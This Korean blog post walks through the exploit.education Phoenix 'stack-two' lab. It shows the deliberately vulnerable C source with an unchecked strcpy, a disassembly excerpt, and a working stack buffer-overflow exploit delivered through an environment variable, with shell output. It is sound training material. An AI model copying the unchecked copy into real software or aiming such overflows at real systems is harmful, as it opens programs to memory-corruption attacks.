![[phoenix] Stack Two](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnHdKr%2FbtrM6KC2Arg%2Fvzm5IS0lWYzxWvcm1rlkk0%2Fimg.png)
728x90
반응형
1. intro
2. code 및 분석
2.1. C code
/*
* phoenix/stack-two, by https://exploit.education
*
* The aim is to change the contents of the changeme variable to 0x0d0a090a
*
* If you're Russian to get to the bath room, and you are Finnish when you get
* out, what are you when you are in the bath room?
*
* European!
*/
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
int main(int argc, char **argv) {
struct {
char buffer[64];
volatile int changeme;
} locals;
char *ptr;
printf("%s\n", BANNER);
ptr = getenv("ExploitEducation");
if (ptr == NULL) {
errx(1, "please set the ExploitEducation environment variable");
}
locals.changeme = 0;
strcpy(locals.buffer, ptr);
if (locals.changeme == 0x0d0a090a) {
puts("Well done, you have successfully set changeme to the correct value");
} else {
printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
locals.changeme);
}
exit(0);
}
2.2. 분석
ptr 변수에 ExploitEducation 환경변수를 넣고, 이를 locals.buffer 변수에 복사한다.
그리고 locals.changeme 변수가 0x0d0a090a로 변경되어야 한다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
strcpy 시 크기 확인을 하지 않아 overwrite가 가능함.
3.2. 공격 준비
buffer 변수의 위치, changeme 변수의 위치만 확인한 뒤 (뭐 비슷하겠지만...) export 명령어를 통해 환경변수에 값을 삽입하면 된다.
...
0x00000000004006f6 <+73>: mov -0x8(%rbp),%rdx
0x00000000004006fa <+77>: lea -0x50(%rbp),%rax
0x00000000004006fe <+81>: mov %rdx,%rsi
0x0000000000400701 <+84>: mov %rax,%rdi
0x0000000000400704 <+87>: callq 0x4004d0 <strcpy@plt>
0x0000000000400709 <+92>: mov -0x10(%rbp),%eax
0x000000000040070c <+95>: cmp $0xd0a090a,%eax
...
4. exploit
root@phoenix-amd64:/opt/phoenix/amd64# export ExploitEducation=`python -c 'print "A"*0x40+"\x0a\x09\x0a\x0d"'`
root@phoenix-amd64:/opt/phoenix/amd64# export
declare -x ExploitEducation="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
"
declare -x HOME="/root"
...
root@phoenix-amd64:/opt/phoenix/amd64# ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value728x90
반응형
'Wargame > Exploit Education' 카테고리의 다른 글
| [Phoenix] Stack four (0) | 2022.09.27 |
|---|---|
| [Phoenix] Stack three (0) | 2022.09.27 |
| [Phoenix] Stack One (0) | 2022.09.26 |
| [Phoenix] Stack Zero (0) | 2022.09.26 |
| Phoenix 환경 설정 및 참고사항. (0) | 2022.09.26 |